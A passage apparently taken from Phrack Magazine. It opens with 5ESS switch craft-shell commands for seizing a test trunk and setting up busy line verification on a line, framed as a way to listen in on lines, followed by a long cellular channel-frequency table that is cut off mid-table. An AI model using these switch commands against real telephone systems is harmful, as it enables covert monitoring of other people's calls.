INH:CAMAONI;
ALW:CAMAONI;
and the minor alarm will stop, and things will go back to normal.
Setting up your own BLV on the 5ESS from the Craft shell RC/V Channel
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well, we have come to the fun part, how to access the No-Test trunk on
the 5ESS (this is also called adding the third trunk). I will not be too
specific on how to do this. You will need to figure out just how to do this.
The first thing you want to do is to request a seizure of a line for
interactive trunk and line testing. One must assign a test position (TP).
SET:WSPHONE,TP=a,DN=b
SET:WSPOS,TP=a,DN=b
This will chose a number to be the test number on the switch. Now using
the CONN:WSLINE one can set up a BLV.
CONN:WSLINE,TP=a,DN=b;
To set this up on a MLHG (can come in real useful for those peksy
public packet switched networks), do a:
CONN:WSLINE,TP=a,MLHG=x-y;
DISC:WSPHONE,TP=z
z = TP 1 through 8
NOTE:
BIG NOTE:
If you set your home telephone number as the test position, and you
have only one phone line, you are stupid.
There are a few people out there who have no idea what they are doing, and
go on thinking they know it all (i.e. No Name Brand). It pisses me off when
these people just go off and make shit up about things they have no idea
what they are talking about.
This file is to all the lazy people out there that just keep bitching
and moaning about not knowing where to find information.
Other Sources
~~~~~~~~~~~~~
Here is a list of Manuals that you can order from the CIC (1-800-432-6600).
Note that some of these manuals are well over hundreds of dollars.
Trademarks
~~~~~~~~~~
I give AT$T due credit for much of this file, for without them, it would not
have been possible!
==Phrack Magazine==
CELLULAR INFORMATION
COMPILED
BY
MADJUS
of
N.O.D.
BAND A
Cell # 2
--------------------------------------------------
Channel 1 (332) Tx 879.960 Rx 834.960
Channel 2 (311) Tx 879.330 Rx 834.330
Channel 3 (290) Tx 878.700 Rx 833.700
Channel 4 (269) Tx 878.070 Rx 833.070
Channel 5 (248) Tx 877.440 Rx 832.440
Channel 6 (227) Tx 876.810 Rx 831.810
Channel 7 (206) Tx 876.180 Rx 831.180
Channel 8 (185) Tx 875.550 Rx 830.550
Channel 9 (164) Tx 874.920 Rx 829.920
Channel 10 (143) Tx 874.290 Rx 829.290
Channel 11 (122) Tx 873.660 Rx 828.660
Channel 12 (101) Tx 873.030 Rx 828.030
Channel 13 (80) Tx 872.400 Rx 827.400
Channel 14 (59) Tx 871.770 Rx 826.770
Channel 15 (38) Tx 871.140 Rx 826.140
Channel 16 (17) Tx 870.510 Rx 825.510
Cell # 3
--------------------------------------------------
Channel 1 (331) Tx 879.930 Rx 834.930
Channel 2 (310) Tx 879.300 Rx 834.300
Channel 3 (289) Tx 878.670 Rx 833.670
Channel 4 (268) Tx 878.040 Rx 833.040
Channel 5 (247) Tx 877.410 Rx 832.410
Channel 6 (226) Tx 876.780 Rx 831.780
Channel 7 (205) Tx 876.150 Rx 831.150
Channel 8 (184) Tx 875.520 Rx 830.520
Channel 9 (163) Tx 874.890 Rx 829.890
Channel 10 (142) Tx 874.260 Rx 829.260
Channel 11 (121) Tx 873.630 Rx 828.630
Channel 12 (100) Tx 873.000 Rx 828.000
Channel 13 (79) Tx 872.370 Rx 827.370
Channel 14 (58) Tx 871.740 Rx 826.740
Channel 15 (37) Tx 871.110 Rx 826.110
Channel 16 (16) Tx 870.480 Rx 825.480
Cell # 4
--------------------------------------------------
Channel 1 (330) Tx 879.900 Rx 834.900
Channel 2 (309) Tx 879.270 Rx 834.270
Channel 3 (288) Tx 878.640 Rx 833.640
Channel 4 (267) Tx 878.010 Rx 833.010
Channel 5 (246) Tx 877.380 Rx 832.380
Channel 6 (225) Tx 876.750 Rx 831.750
Channel 7 (204) Tx 876.120 Rx 831.120
Channel 8 (183) Tx 875.490 Rx 830.490
Channel 9 (162) Tx 874.860 Rx 829.860
Channel 10 (141) Tx 874.230 Rx 829.230
Channel 11 (120) Tx 873.600 Rx 828.600
Channel 12 (99) Tx 872.970 Rx 827.970
Channel 13 (78) Tx 872.340 Rx 827.340
Channel 14 (57) Tx 871.710 Rx 826.710
Channel 15 (36) Tx 871.080 Rx 826.080
Channel 16 (15) Tx 870.450 Rx 825.450
Cell # 5
--------------------------------------------------
Channel 1 (329) Tx 879.870 Rx 834.870
Channel 2 (308) Tx 879.240 Rx 834.240
Channel 3 (287) Tx 878.610 Rx 833.610
Channel 4 (266) Tx 877.980 Rx 832.980
Channel 5 (245) Tx 877.350 Rx 832.350
Channel 6 (224) Tx 876.720 Rx 831.720
Channel 7 (203) Tx 876.090 Rx 831.090
Channel 8 (182) Tx 875.460 Rx 830.460
Channel 9 (161) Tx 874.830 Rx 829.830
Channel 10 (140) Tx 874.200 Rx 829.200
Channel 11 (119) Tx 873.570 Rx 828.570
Channel 12 (98) Tx 872.940 Rx 827.940
Channel 13 (77) Tx 872.310 Rx 827.310
Channel 14 (56) Tx 871.680 Rx 826.680
Channel 15 (35) Tx 871.050 Rx 826.050
Channel 16 (14) Tx 870.420 Rx 825.420
Cell # 6
--------------------------------------------------
Channel 1 (328) Tx 879.840 Rx 834.840
Channel 2 (307) Tx 879.210 Rx 834.210
Channel 3 (286) Tx 878.580 Rx 833.580
Channel 4 (265) Tx 877.950 Rx 832.950
Channel 5 (244) Tx 877.320 Rx 832.320
Channel 6 (223) Tx 876.690 Rx 831.690
Channel 7 (202) Tx 876.060 Rx 831.060
Channel 8 (181) Tx 875.430 Rx 830.430
Channel 9 (160) Tx 874.800 Rx 829.800
Channel 10 (139) Tx 874.170 Rx 829.170
Channel 11 (118) Tx 873.540 Rx 828.540
Channel 12 (97) Tx 872.910 Rx 827.910
Channel 13 (76) Tx 872.280 Rx 827.280
Channel 14 (55) Tx 871.650 Rx 826.650
Channel 15 (34) Tx 871.020 Rx 826.020
Channel 16 (13) Tx 870.390 Rx 825.390
Cell # 7
--------------------------------------------------
Channel 1 (327) Tx 879.810 Rx 834.810
Channel 2 (306) Tx 879.180 Rx 834.180
Channel 3 (285) Tx 878.550 Rx 833.550
Channel 4 (264) Tx 877.920 Rx 832.920
Channel 5 (243) Tx 877.290 Rx 832.290
Channel 6 (222) Tx 876.660 Rx 831.660
Channel 7 (201) Tx 876.030 Rx 831.030
Channel 8 (180) Tx 875.400 Rx 830.400
Channel 9 (159) Tx 874.770 Rx 829.770
Channel 10 (138) Tx 874.140 Rx 829.140
Channel 11 (117) Tx 873.510 Rx 828.510
Channel 12 (96) Tx 872.880 Rx 827.880
Channel 13 (75) Tx 872.250 Rx 827.250
Channel 14 (54) Tx 871.620 Rx 826.620
Channel 15 (33) Tx 870.990 Rx 825.990
Channel 16 (12) Tx 870.360 Rx 825.360
Cell # 8
--------------------------------------------------
Channel 1 (326) Tx 879.780 Rx 834.780
Channel 2 (305) Tx 879.150 Rx 834.150
Channel 3 (284) Tx 878.520 Rx 833.520
Channel 4 (263) Tx 877.890 Rx 832.890
Channel 5 (242) Tx 877.260 Rx 832.260
Channel 6 (221) Tx 876.630 Rx 831.630
Channel 7 (200) Tx 876.000 Rx 831.000
Channel 8 (179) Tx 875.370 Rx 830.370
Channel 9 (158) Tx 874.740 Rx 829.740
Channel 10 (137) Tx 874.110 Rx 829.110
Channel 11 (116) Tx 873.480 Rx 828.480
Channel 12 (95) Tx 872.850 Rx 827.850
Channel 13 (74) Tx 872.220 Rx 827.220
Channel 14 (53) Tx 871.590 Rx 826.590
Channel 15 (32) Tx 870.960 Rx 825.960
Channel 16 (11) Tx 870.330 Rx 825.330
Cell # 9
--------------------------------------------------
Channel 1 (325) Tx 879.750 Rx 834.750
Channel 2 (304) Tx 879.120 Rx 834.120
Channel 3 (283) Tx 878.490 Rx 833.490
Channel 4 (262) Tx 877.860 Rx 832.860
Channel 5 (241) Tx 877.230 Rx 832.230
Channel 6 (220) Tx 876.600 Rx 831.600
Channel 7 (199) Tx 875.970 Rx 830.970
Channel 8 (178) Tx 875.340 Rx 830.340
Channel 9 (157) Tx 874.710 Rx 829.710
Channel 10 (136) Tx 874.080 Rx 829.080
Channel 11 (115) Tx 873.450 Rx 828.450
Channel 12 (94) Tx 872.820 Rx 827.820
Channel 13 (73) Tx 872.190 Rx 827.190
Channel 14 (52) Tx 871.560 Rx 826.560
Channel 15 (31) Tx 870.930 Rx 825.930
Channel 16 (10) Tx 870.300 Rx 825.300
Cell # 10
--------------------------------------------------
Channel 1 (324) Tx 879.720 Rx 834.720
Channel 2 (303) Tx 879.090 Rx 834.090
Channel 3 (282) Tx 878.460 Rx 833.460
Channel 4 (261) Tx 877.830 Rx 832.830
Channel 5 (240) Tx 877.200 Rx 832.200
Channel 6 (219) Tx 876.570 Rx 831.570
Channel 7 (198) Tx 875.940 Rx 830.940
Channel 8 (177) Tx 875.310 Rx 830.310
Channel 9 (156) Tx 874.680 Rx 829.680
Channel 10 (135) Tx 874.050 Rx 829.050
Channel 11 (114) Tx 873.420 Rx 828.420
Channel 12 (93) Tx 872.790 Rx 827.790
Channel 13 (72) Tx 872.160 Rx 827.160
Channel 14 (51) Tx 871.530 Rx 826.530
Channel 15 (30) Tx 870.900 Rx 825.900
Channel 16 (9) Tx 870.270 Rx 825.270
Cell # 11
--------------------------------------------------
Channel 1 (323) Tx 879.690 Rx 834.690
Channel 2 (302) Tx 879.060 Rx 834.060
Channel 3 (281) Tx 878.430 Rx 833.430
Channel 4 (260) Tx 877.800 Rx 832.800
Channel 5 (239) Tx 877.170 Rx 832.170
Channel 6 (218) Tx 876.540 Rx 831.540
Channel 7 (197) Tx 875.910 Rx 830.910
Channel 8 (176) Tx 875.280 Rx 830.280
Channel 9 (155) Tx 874.650 Rx 829.650
Channel 10 (134) Tx 874.020 Rx 829.020
Channel 11 (113) Tx 873.390 Rx 828.390
Channel 12 (92) Tx 872.760 Rx 827.760
Channel 13 (71) Tx 872.130 Rx 827.130
Channel 14 (50) Tx 871.500 Rx 826.500
Channel 15 (29) Tx 870.870 Rx 825.870
Channel 16 (8) Tx 870.240 Rx 825.240
Cell # 12
--------------------------------------------------
Channel 1 (322) Tx 879.660 Rx 834.660
Channel 2 (301) Tx 879.030 Rx 834.030
Channel 3 (280) Tx 878.400 Rx 833.400
Channel 4 (259) Tx 877.770 Rx 832.770
Channel 5 (238) Tx 877.140 Rx 832.140
Channel 6 (217) Tx 876.510 Rx 831.510
Channel 7 (196) Tx 875.880 Rx 830.880
Channel 8 (175) Tx 875.250 Rx 830.250
Channel 9 (154) Tx 874.620 Rx 829.620
Channel 10 (133) Tx 873.990 Rx 828.990
Channel 11 (112) Tx 873.360 Rx 828.360
Channel 12 (91) Tx 872.730 Rx 827.730
Channel 13 (70) Tx 872.100 Rx 827.100
Channel 14 (49) Tx 871.470 Rx 826.470
Channel 15 (28) Tx 870.840 Rx 825.840
Channel 16 (7) Tx 870.210 Rx 825.210
Cell # 13
--------------------------------------------------
Channel 1 (321) Tx 879.630 Rx 834.630
Channel 2 (300) Tx 879.000 Rx 834.000
Channel 3 (279) Tx 878.370 Rx 833.370
Channel 4 (258) Tx 877.740 Rx 832.740
Channel 5 (237) Tx 877.110 Rx 832.110
Channel 6 (216) Tx 876.480 Rx 831.480
Channel 7 (195) Tx 875.850 Rx 830.850
Channel 8 (174) Tx 875.220 Rx 830.220
Channel 9 (153) Tx 874.590 Rx 829.590
Channel 10 (132) Tx 873.960 Rx 828.960
Channel 11 (111) Tx 873.330 Rx 828.330
Channel 12 (90) Tx 872.700 Rx 827.700
Channel 13 (69) Tx 872.070 Rx 827.070
Channel 14 (48) Tx 871.440 Rx 826.440
Channel 15 (27) Tx 870.810 Rx 825.810
Channel 16 (6) Tx 870.180 Rx 825.180
Cell # 14
--------------------------------------------------
Channel 1 (320) Tx 879.600 Rx 834.600
Channel 2 (299) Tx 878.970 Rx 833.970
Channel 3 (278) Tx 878.340 Rx 833.340
Channel 4 (257) Tx 877.710 Rx 832.710
Channel 5 (236) Tx 877.080 Rx 832.080
Channel 6 (215) Tx 876.450 Rx 831.450
Channel 7 (194) Tx 875.820 Rx 830.820
Channel 8 (173) Tx 875.190 Rx 830.190
Channel 9 (152) Tx 874.560 Rx 829.560
Channel 10 (131) Tx 873.930 Rx 828.930
Channel 11 (110) Tx 873.300 Rx 828.300
Channel 12 (89) Tx 872.670 Rx 827.670
Channel 13 (68) Tx 872.040 Rx 827.040
Channel 14 (47) Tx 871.410 Rx 826.410
Channel 15 (26) Tx 870.780 Rx 825.780
Channel 16 (5) Tx 870.150 Rx 825.150
Cell # 15
--------------------------------------------------
Channel 1 (319) Tx 879.570 Rx 834.570
Channel 2 (298) Tx 878.940 Rx 833.940
Channel 3 (277) Tx 878.310 Rx 833.310
Channel 4 (256) Tx 877.680 Rx 832.680
Channel 5 (235) Tx 877.050 Rx 832.050
Channel 6 (214) Tx 876.420 Rx 831.420
Channel 7 (193) Tx 875.790 Rx 830.790
Channel 8 (172) Tx 875.160 Rx 830.160
Channel 9 (151) Tx 874.530 Rx 829.530
Channel 10 (130) Tx 873.900 Rx 828.900
Channel 11 (109) Tx 873.270 Rx 828.270
Channel 12 (88) Tx 872.640 Rx 827.640
Channel 13 (67) Tx 872.010 Rx 827.010
Channel 14 (46) Tx 871.380 Rx 826.380
Channel 15 (25) Tx 870.750 Rx 825.750
Channel 16 (4) Tx 870.120 Rx 825.120
Cell # 16
--------------------------------------------------
Channel 1 (318) Tx 879.540 Rx 834.540
Channel 2 (297) Tx 878.910 Rx 833.910
Channel 3 (276) Tx 878.280 Rx 833.280
Channel 4 (255) Tx 877.650 Rx 832.650
Channel 5 (234) Tx 877.020 Rx 832.020
Channel 6 (213) Tx 876.390 Rx 831.390
Channel 7 (192) Tx 875.760 Rx 830.760
Channel 8 (171) Tx 875.130 Rx 830.130
Channel 9 (150) Tx 874.500 Rx 829.500
Channel 10 (129) Tx 873.870 Rx 828.870
Channel 11 (108) Tx 873.240 Rx 828.240
Channel 12 (87) Tx 872.610 Rx 827.610
Channel 13 (66) Tx 871.980 Rx 826.980
Channel 14 (45) Tx 871.350 Rx 826.350
Channel 15 (24) Tx 870.720 Rx 825.720
Channel 16 (3) Tx 870.090 Rx 825.090
Cell # 17
--------------------------------------------------
Channel 1 (317) Tx 879.510 Rx 834.510
Channel 2 (296) Tx 878.880 Rx 833.880
Channel 3 (275) Tx 878.250 Rx 833.250
Channel 4 (254) Tx 877.620 Rx 832.620
Channel 5 (233) Tx 876.990 Rx 831.990
Channel 6 (212) Tx 876.360 Rx 831.360
Channel 7 (191) Tx 875.730 Rx 830.730
Channel 8 (170) Tx 875.100 Rx 830.100
Channel 9 (149) Tx 874.470 Rx 829.470
Channel 10 (128) Tx 873.840 Rx 828.840
Channel 11 (107) Tx 873.210 Rx 828.210
Channel 12 (86) Tx 872.580 Rx 827.580
Channel 13 (65) Tx 871.950 Rx 826.950
Channel 14 (44) Tx 871.320 Rx 826.320
Channel 15 (23) Tx 870.690 Rx 825.690
Channel 16 (2) Tx 870.060 Rx 825.060
Cell # 18
--------------------------------------------------
Channel 1 (316) Tx 879.480 Rx 834.480
Channel 2 (295) Tx 878.850 Rx 833.850
Channel 3 (274) Tx 878.220 Rx 833.220
Channel 4 (253) Tx 877.590 Rx 832.590
Channel 5 (232) Tx 876.960 Rx 831.960
Channel 6 (211) Tx 876.330 Rx 831.330
Channel 7 (190) Tx 875.700 Rx 830.700
Channel 8 (169) Tx 875.070 Rx 830.070
Channel 9 (148) Tx 874.440 Rx 829.440
Channel 10 (127) Tx 873.810 Rx 828.810
Channel 11 (106) Tx 873.180 Rx 828.180
Channel 12 (85) Tx 872.550 Rx 827.550
Channel 13 (64) Tx 871.920 Rx 826.920
Channel 14 (43) Tx 871.290 Rx 826.290
Channel 15 (22) Tx 870.660 Rx 825.660
Channel 16 (1) Tx 870.030 Rx 825.030
Cell # 19
--------------------------------------------------
Channel 1 (315) Tx 879.450 Rx 834.450
Channel 2 (294) Tx 878.820 Rx 833.820
Channel 3 (273) Tx 878.190 Rx 833.190
Channel 4 (252) Tx 877.560 Rx 832.560
Channel 5 (231) Tx 876.930 Rx 831.930
Channel 6 (210) Tx 876.300 Rx 831.300
Channel 7 (189) Tx 875.670 Rx 830.670
Channel 8 (168) Tx 875.040 Rx 830.040
Channel 9 (147) Tx 874.410 Rx 829.410
Channel 10 (126) Tx 873.780 Rx 828.780
Channel 11 (105) Tx 873.150 Rx 828.150
Channel 12 (84) Tx 872.520 Rx 827.520
Channel 13 (63) Tx 871.890 Rx 826.890
Channel 14 (42) Tx 871.260 Rx 826.260
Channel 15 (21) Tx 870.630 Rx 825.630
Cell # 20
--------------------------------------------------
Channel 1 (314) Tx 879.420 Rx 834.420
Channel 2 (293) Tx 878.790 Rx 833.790
Channel 3 (272) Tx 878.160 Rx 833.160
Channel 4 (251) Tx 877.530 Rx 832.530
Channel 5 (230) Tx 876.900 Rx 831.900
Channel 6 (209) Tx 876.270 Rx 831.270
Channel 7 (188) Tx 875.640 Rx 830.640
Channel 8 (167) Tx 875.010 Rx 830.010
Channel 9 (146) Tx 874.380 Rx 829.380
Channel 10 (125) Tx 873.750 Rx 828.750
Channel 11 (104) Tx 873.120 Rx 828.120
Channel 12 (83) Tx 872.490 Rx 827.490
Channel 13 (62) Tx 871.860 Rx 826.860
Channel 14 (41) Tx 871.230 Rx 826.230
Channel 15 (20) Tx 870.600 Rx 825.600
Cell # 21
--------------------------------------------------
Channel 1 (313) Tx 879.390 Rx 834.390
Channel 2 (292) Tx 878.760 Rx 833.760
Channel 3 (271) Tx 878.130 Rx 833.130
Channel 4 (250) Tx 877.500 Rx 832.500
Channel 5 (229) Tx 876.870 Rx 831.870
Channel 6 (208) Tx 876.240 Rx 831.240
Channel 7 (187) Tx 875.610 Rx 830.610
Channel 8 (166) Tx 874.980 Rx 829.980
Channel 9 (145) Tx 874.350 Rx 829.350
Channel 10 (124) Tx 873.720 Rx 828.720
Channel 11 (103) Tx 873.090 Rx 828.090
Channel 12 (82) Tx 872.460 Rx 827.460
Channel 13 (61) Tx 871.830 Rx 826.830
Channel 14 (40) Tx 871.200 Rx 826.200
Channel 15 (19) Tx 870.570 Rx 825.570
**************************************************
BAND B
Cell # 1
--------------------------------------------------
Channel 1 (334) Tx 880.020 Rx 835.020
Channel 2 (355) Tx 880.650 Rx 835.650
Channel 3 (376) Tx 881.280 Rx 836.280
Channel 4 (397) Tx 881.910 Rx 836.910
Channel 5 (418) Tx 882.540 Rx 837.540
Channel 6 (439) Tx 883.170 Rx 838.170
Channel 7 (460) Tx 883.800 Rx 838.800
Channel 8 (481) Tx 884.430 Rx 839.430
Channel 9 (502) Tx 885.060 Rx 840.060
Channel 10 (523) Tx 885.690 Rx 840.690
Channel 11 (544) Tx 886.320 Rx 841.320
Channel 12 (565) Tx 886.950 Rx 841.950
Channel 13 (586) Tx 887.580 Rx 842.580
Channel 14 (607) Tx 888.210 Rx 843.210
Channel 15 (628) Tx 888.840 Rx 843.840
Channel 16 (649) Tx 889.470 Rx 844.470
Cell # 2
--------------------------------------------------
Channel 1 (335) Tx 880.050 Rx 835.050
Channel 2 (356) Tx 880.680 Rx 835.680
Channel 3 (377) Tx 881.310 Rx 836.310
Channel 4 (398) Tx 881.940 Rx 836.940
Channel 5 (419) Tx 882.570 Rx 837.570
Channel 6 (440) Tx 883.200 Rx 838.200
Channel 7 (461) Tx 883.830 Rx 838.830
Channel 8 (482) Tx 884.460 Rx 839.460
Channel 9 (503) Tx 885.090 Rx 840.090
Channel 10 (524) Tx 885.720 Rx 840.720
Channel 11 (545) Tx 886.350 Rx 841.350
Channel 12 (566) Tx 886.980 Rx 841.980
Channel 13 (587) Tx 887.610 Rx 842.610
Channel 14 (608) Tx 888.240 Rx 843.240
Channel 15 (629) Tx 888.870 Rx 843.870
Channel 16 (650) Tx 889.500 Rx 844.500
Cell # 3
--------------------------------------------------
Channel 1 (336) Tx 880.080 Rx 835.080
Channel 2 (357) Tx 880.710 Rx 835.710
Channel 3 (378) Tx 881.340 Rx 836.340
Channel 4 (399) Tx 881.970 Rx 836.970
Channel 5 (420) Tx 882.600 Rx 837.600
Channel 6 (441) Tx 883.230 Rx 838.230
Channel 7 (462) Tx 883.860 Rx 838.860
Channel 8 (483) Tx 884.490 Rx 839.490
Channel 9 (504) Tx 885.120 Rx 840.120
Channel 10 (525) Tx 885.750 Rx 840.750
Channel 11 (546) Tx 886.380 Rx 841.380
Channel 12 (567) Tx 887.010 Rx 842.010
Channel 13 (588) Tx 887.640 Rx 842.640
Channel 14 (609) Tx 888.270 Rx 843.270
Channel 15 (630) Tx 888.900 Rx 843.900
Channel 16 (651) Tx 889.530 Rx 844.530
Cell # 4
--------------------------------------------------
Channel 1 (337) Tx 880.110 Rx 835.110
Channel 2 (358) Tx 880.740 Rx 835.740
Channel 3 (379) Tx 881.370 Rx 836.370
Channel 4 (400) Tx 882.000 Rx 837.000
Channel 5 (421) Tx 882.630 Rx 837.630
Channel 6 (442) Tx 883.260 Rx 838.260
Channel 7 (463) Tx 883.890 Rx 838.890
Channel 8 (484) Tx 884.520 Rx 839.520
Channel 9 (505) Tx 885.150 Rx 840.150
Channel 10 (526) Tx 885.780 Rx 840.780
Channel 11 (547) Tx 886.410 Rx 841.410
Channel 12 (568) Tx 887.040 Rx 842.040
Channel 13 (589) Tx 887.670 Rx 842.670
Channel 14 (610) Tx 888.300 Rx 843.300
Channel 15 (631) Tx 888.930 Rx 843.930
Channel 16 (652) Tx 889.560 Rx 844.560
Cell # 5
--------------------------------------------------
Channel 1 (338) Tx 880.140 Rx 835.140
Channel 2 (359) Tx 880.770 Rx 835.770
Channel 3 (380) Tx 881.400 Rx 836.400
Channel 4 (401) Tx 882.030 Rx 837.030
Channel 5 (422) Tx 882.660 Rx 837.660
Channel 6 (443) Tx 883.290 Rx 838.290
Channel 7 (464) Tx 883.920 Rx 838.920
Channel 8 (485) Tx 884.550 Rx 839.550
Channel 9 (506) Tx 885.180 Rx 840.180
Channel 10 (527) Tx 885.810 Rx 840.810
Channel 11 (548) Tx 886.440 Rx 841.440
Channel 12 (569) Tx 887.070 Rx 842.070
Channel 13 (590) Tx 887.700 Rx 842.700
Channel 14 (611) Tx 888.330 Rx 843.330
Channel 15 (632) Tx 888.960 Rx 843.960
Channel 16 (653) Tx 889.590 Rx 844.590
Cell # 6
--------------------------------------------------
Channel 1 (339) Tx 880.170 Rx 835.170
Channel 2 (360) Tx 880.800 Rx 835.800
Channel 3 (381) Tx 881.430 Rx 836.430
Channel 4 (402) Tx 882.060 Rx 837.060
Channel 5 (423) Tx 882.690 Rx 837.690
Channel 6 (444) Tx 883.320 Rx 838.320
Channel 7 (465) Tx 883.950 Rx 838.950
Channel 8 (486) Tx 884.580 Rx 839.580
Channel 9 (507) Tx 885.210 Rx 840.210
Channel 10 (528) Tx 885.840 Rx 840.840
Channel 11 (549) Tx 886.470 Rx 841.470
Channel 12 (570) Tx 887.100 Rx 842.100
Channel 13 (591) Tx 887.730 Rx 842.730
Channel 14 (612) Tx 888.360 Rx 843.360
Channel 15 (633) Tx 888.990 Rx 843.990
Channel 16 (654) Tx 889.620 Rx 844.620
Cell # 7
--------------------------------------------------
Channel 1 (340) Tx 880.200 Rx 835.200
Channel 2 (361) Tx 880.830 Rx 835.830
Channel 3 (382) Tx 881.460 Rx 836.460
Channel 4 (403) Tx 882.090 Rx 837.090
Channel 5 (424) Tx 882.720 Rx 837.720
Channel 6 (445) Tx 883.350 Rx 838.350
Channel 7 (466) Tx 883.980 Rx 838.980
Channel 8 (487) Tx 884.610 Rx 839.610
Channel 9 (508) Tx 885.240 Rx 840.240
Channel 10 (529) Tx 885.870 Rx 840.870
Channel 11 (550) Tx 886.500 Rx 841.500
Channel 12 (571) Tx 887.130 Rx 842.130
Channel 13 (592) Tx 887.760 Rx 842.760
Channel 14 (613) Tx 888.390 Rx 843.390
Channel 15 (634) Tx 889.020 Rx 844.020
Channel 16 (655) Tx 889.650 Rx 844.650
Cell # 8
--------------------------------------------------
Channel 1 (341) Tx 880.230 Rx 835.230
Channel 2 (362) Tx 880.860 Rx 835.860
Channel 3 (383) Tx 881.490 Rx 836.490
Channel 4 (404) Tx 882.120 Rx 837.120
Channel 5 (425) Tx 882.750 Rx 837.750
Channel 6 (446) Tx 883.380 Rx 838.380
Channel 7 (467) Tx 884.010 Rx 839.010
Channel 8 (488) Tx 884.640 Rx 839.640
Channel 9 (509) Tx 885.270 Rx 840.270
Channel 10 (530) Tx 885.900 Rx 840.900
Channel 11 (551) Tx 886.530 Rx 841.530
Channel 12 (572) Tx 887.160 Rx 842.160
Channel 13 (593) Tx 887.790 Rx 842.790
Channel 14 (614) Tx 888.420 Rx 843.420
Channel 15 (635) Tx 889.050 Rx 844.050
Channel 16 (656) Tx 889.680 Rx 844.680
Cell # 9
--------------------------------------------------
Channel 1 (342) Tx 880.260 Rx 835.260
Channel 2 (363) Tx 880.890 Rx 835.890
Channel 3 (384) Tx 881.520 Rx 836.520
Channel 4 (405) Tx 882.150 Rx 837.150
Channel 5 (426) Tx 882.780 Rx 837.780
Channel 6 (447) Tx 883.410 Rx 838.410
Channel 7 (468) Tx 884.040 Rx 839.040
Channel 8 (489) Tx 884.670 Rx 839.670
Channel 9 (510) Tx 885.300 Rx 840.300
Channel 10 (531) Tx 885.930 Rx 840.930
Channel 11 (552) Tx 886.560 Rx 841.560
Channel 12 (573) Tx 887.190 Rx 842.190
Channel 13 (594) Tx 887.820 Rx 842.820
Channel 14 (615) Tx 888.450 Rx 843.450
Channel 15 (636) Tx 889.080 Rx 844.080
Channel 16 (657) Tx 889.710 Rx 844.710
Cell # 10
--------------------------------------------------
Channel 1 (343) Tx 880.290 Rx 835.290
Channel 2 (364) Tx 880.920 Rx 835.920
Channel 3 (385) Tx 881.550 Rx 836.550
Channel 4 (406) Tx 882.180 Rx 837.180
Channel 5 (427) Tx 882.810 Rx 837.810
Channel 6 (448) Tx 883.440 Rx 838.440
Channel 7 (469) Tx 884.070 Rx 839.070
Channel 8 (490) Tx 884.700 Rx 839.700
Channel 9 (511) Tx 885.330 Rx 840.330
Channel 10 (532) Tx 885.960 Rx 840.960
Channel 11 (553) Tx 886.590 Rx 841.590
Channel 12 (574) Tx 887.220 Rx 842.220
Channel 13 (595) Tx 887.850 Rx 842.850
Channel 14 (616) Tx 888.480 Rx 843.480
Channel 15 (637) Tx 889.110 Rx 844.110
Channel 16 (658) Tx 889.740 Rx 844.740
Cell # 11
--------------------------------------------------
Channel 1 (344) Tx 880.320 Rx 835.320
Channel 2 (365) Tx 880.950 Rx 835.950
Channel 3 (386) Tx 881.580 Rx 836.580
Channel 4 (407) Tx 882.210 Rx 837.210
Channel 5 (428) Tx 882.840 Rx 837.840
Channel 6 (449) Tx 883.470 Rx 838.470
Channel 7 (470) Tx 884.100 Rx 839.100
Channel 8 (491) Tx 884.730 Rx 839.730
Channel 9 (512) Tx 885.360 Rx 840.360
Channel 10 (533) Tx 885.990 Rx 840.990
Channel 11 (554) Tx 886.620 Rx 841.620
Channel 12 (575) Tx 887.250 Rx 842.250
Channel 13 (596) Tx 887.880 Rx 842.880
Channel 14 (617) Tx 888.510 Rx 843.510
Channel 15 (638) Tx 889.140 Rx 844.140
Channel 16 (659) Tx 889.770 Rx 844.770
Cell # 12
--------------------------------------------------
Channel 1 (345) Tx 880.350 Rx 835.350
Channel 2 (366) Tx 880.980 Rx 835.980
Channel 3 (387) Tx 881.610 Rx 836.610
Channel 4 (408) Tx 882.240 Rx 837.240
Channel 5 (429) Tx 882.870 Rx 837.870
Channel 6 (450) Tx 883.500 Rx 838.500
Channel 7 (471) Tx 884.130 Rx 839.130
Channel 8 (492) Tx 884.760 Rx 839.760
Channel 9 (513) Tx 885.390 Rx 840.390
Channel 10 (534) Tx 886.020 Rx 841.020
Channel 11 (555) Tx 886.650 Rx 841.650
Channel 12 (576) Tx 887.280 Rx 842.280
Channel 13 (597) Tx 887.910 Rx 842.910
Channel 14 (618) Tx 888.540 Rx 843.540
Channel 15 (639) Tx 889.170 Rx 844.170
Channel 16 (660) Tx 889.800 Rx 844.800
Cell # 13
--------------------------------------------------
Channel 1 (346) Tx 880.380 Rx 835.380
Channel 2 (367) Tx 881.010 Rx 836.010
Channel 3 (388) Tx 881.640 Rx 836.640
Channel 4 (409) Tx 882.270 Rx 837.270
Channel 5 (430) Tx 882.900 Rx 837.900
Channel 6 (451) Tx 883.530 Rx 838.530
Channel 7 (472) Tx 884.160 Rx 839.160
Channel 8 (493) Tx 884.790 Rx 839.790
Channel 9 (514) Tx 885.420 Rx 840.420
Channel 10 (535) Tx 886.050 Rx 841.050
Channel 11 (556) Tx 886.680 Rx 841.680
Channel 12 (577) Tx 887.310 Rx 842.310
Channel 13 (598) Tx 887.940 Rx 842.940
Channel 14 (619) Tx 888.570 Rx 843.570
Channel 15 (640) Tx 889.200 Rx 844.200
Channel 16 (661) Tx 889.830 Rx 844.830
Cell # 14
--------------------------------------------------
Channel 1 (347) Tx 880.410 Rx 835.410
Channel 2 (368) Tx 881.040 Rx 836.040
Channel 3 (389) Tx 881.670 Rx 836.670
Channel 4 (410) Tx 882.300 Rx 837.300
Channel 5 (431) Tx 882.930 Rx 837.930
Channel 6 (452) Tx 883.560 Rx 838.560
Channel 7 (473) Tx 884.190 Rx 839.190
Channel 8 (494) Tx 884.820 Rx 839.820
Channel 9 (515) Tx 885.450 Rx 840.450
Channel 10 (536) Tx 886.080 Rx 841.080
Channel 11 (557) Tx 886.710 Rx 841.710
Channel 12 (578) Tx 887.340 Rx 842.340
Channel 13 (599) Tx 887.970 Rx 842.970
Channel 14 (620) Tx 888.600 Rx 843.600
Channel 15 (641) Tx 889.230 Rx 844.230
Channel 16 (662) Tx 889.860 Rx 844.860
Cell # 15
--------------------------------------------------
Channel 1 (348) Tx 880.440 Rx 835.440
Channel 2 (369) Tx 881.070 Rx 836.070
Channel 3 (390) Tx 881.700 Rx 836.700
